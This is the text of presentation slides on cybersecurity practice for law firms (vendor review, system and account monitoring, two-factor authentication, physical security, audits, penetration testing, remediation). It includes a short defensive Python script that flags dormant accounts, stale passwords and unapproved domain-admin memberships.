  • 23. Verify Your Vendors • Your firm's vendors must also follow proper security protocols. • Vendors, especially those hosting your data in the cloud, need to pay particular attention to securing and protecting it. • Review every vendor's commitment to protecting your data, together with their security certifications and policies.
  • 24. Monitor Your Systems • Every firm should run reputable antivirus, antispam, anti-malware and intrusion detection. • Manage these systems so that protection is active (not disabled by end users) and up to date. • Routinely check firewall logs: they show the extent to which your users are under attack and reveal administrative access to, and changes on, the firewall. • Periodically check the firewall configuration for unwanted changes. • Also manage and monitor user accounts: scan for accounts not accessed for a period of time, stale passwords, and membership of administrative groups. • Every IT administrator has added users to high-level security groups such as Domain Admins to test or troubleshoot, only to leave them there by accident.
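The account review described above, as an added example that is not part of the presentation: a small directory export (constructed for the example; a real one would come from an AD or LDAP query) is checked for dormant accounts, stale passwords and privileged-group members who are not on the firm's approved list. The thresholds, the approved-admin list and the date of the review are assumptions.

```python
from datetime import date
from typing import Dict, Iterable, List, Set

# Constructed directory export (assumption: fields as an AD/LDAP dump would give them).
ACCOUNTS = [
    {"user": "alice",    "last_logon": "2016-03-28", "pwd_last_set": "2016-01-10",
     "groups": ["Domain Users"]},
    {"user": "bob",      "last_logon": "2015-10-01", "pwd_last_set": "2014-02-01",
     "groups": ["Domain Users", "Domain Admins"]},
    {"user": "svc-scan", "last_logon": "2016-03-30", "pwd_last_set": "2015-06-01",
     "groups": ["Domain Users", "Domain Admins"]},
    {"user": "itadmin",  "last_logon": "2016-03-31", "pwd_last_set": "2016-03-01",
     "groups": ["Domain Admins"]},
]
APPROVED_ADMINS: Set[str] = {"itadmin"}  # the firm's documented list (assumed)
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}


def _days_since(day: str, as_of: date) -> int:
    return (as_of - date.fromisoformat(day)).days


def review_accounts(accounts: Iterable[dict], as_of: date, approved_admins: Set[str],
                    stale_logon_days: int = 90,
                    stale_password_days: int = 180) -> Dict[str, List[str]]:
    """Flag dormant accounts, stale passwords, and privileged-group members who
    are not on the approved list. Returns a sorted user list per finding."""
    findings: Dict[str, List[str]] = {"stale_logon": [], "stale_password": [],
                                      "unapproved_admin": []}
    for acct in accounts:
        user = acct["user"]
        if _days_since(acct["last_logon"], as_of) > stale_logon_days:
            findings["stale_logon"].append(user)
        if _days_since(acct["pwd_last_set"], as_of) > stale_password_days:
            findings["stale_password"].append(user)
        if PRIVILEGED_GROUPS.intersection(acct["groups"]) and user not in approved_admins:
            findings["unapproved_admin"].append(user)
    return {k: sorted(v) for k, v in findings.items()}


def run_review(as_of_iso: str = "2016-04-01") -> Dict[str, List[str]]:
    """Review the constructed export as of the given date."""
    return review_accounts(ACCOUNTS, date.fromisoformat(as_of_iso), APPROVED_ADMINS)


def report(findings: Dict[str, List[str]]) -> str:
    lines = []
    for finding, users in findings.items():
        lines.append("%-18s %s" % (finding + ":", ", ".join(users) or "(none)"))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(run_review()))
```

Run on a schedule and diff the output against the previous run; a name appearing in `unapproved_admin` is exactly the "left in the group by accident" case the slide describes.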
  • 25. Make System Entry Difficult • Law firms of all sizes should use two-factor authentication. • Two-factor authentication requires two things from a user before access is granted: something the user has and something the user knows. • The item the user has is a token, either a physical token or an authenticator application on a smartphone that generates one-time codes. • The thing the user knows is a password or PIN. • Together they significantly raise the security of remotely accessed systems, because a stolen or phished password alone is no longer enough.
  • 26. Prioritize Physical Security • Physical security matters too. • Server room doors and cabinets should be locked wherever possible. • Consider an affordable security camera system that can record physical access. • Stored data should be encrypted, so that a stolen disk or laptop does not become a breach. • Consider a clean-and-clear desk policy, which requires everyone to lock their computers when they walk away and to log off when not using them. • The policy should extend to laptops and other data storage devices, which should be locked away when the employee is not present. • No data, printed or electronic, should be left unattended.
  • 27. Engage a Third Party for Security Audits • Once you have settled your new policies, put new systems and protections in place and trained your end users, consider bringing in a third party. • Someone not involved in the firm's day-to-day IT should perform the security analysis. • An outside security expert will perform a top-down evaluation of your systems, security policies and practices, and will review physical access to the systems.
  • 28. Try to Break In • A penetration test is the process of trying to break into a system in order to identify vulnerabilities before an attacker does. • A pen test has to be executed with care: performed recklessly it can cause system or network damage through buffer overflows, Denial of Service (DoS) conditions and misconfiguration of systems, so agree the scope, timing and rules of engagement in writing beforehand. • Repeat pen tests at least annually, or more often. • If you change your firewall or other major systems during the year, repeat the pen test.
  • 29. Remediate Carefully • At the end of a security audit or pen test you will receive a remediation plan. • The IT department should review the recommended changes carefully before implementation to consider possible adverse effects on other systems and end users. • Some believe that threats are irrelevant for small firms; nothing could be further from the truth. • It is increasingly common for clients of law firms to dictate security requirements, so every firm should make strengthening its security policies a top priority.
  • 30. THANK YOU. ADV. PRASHANT MALI. Email: cyberlawconsulting@gmail.com. Web site: www.prashantmali.com. Twitter: @CyberMahaGuru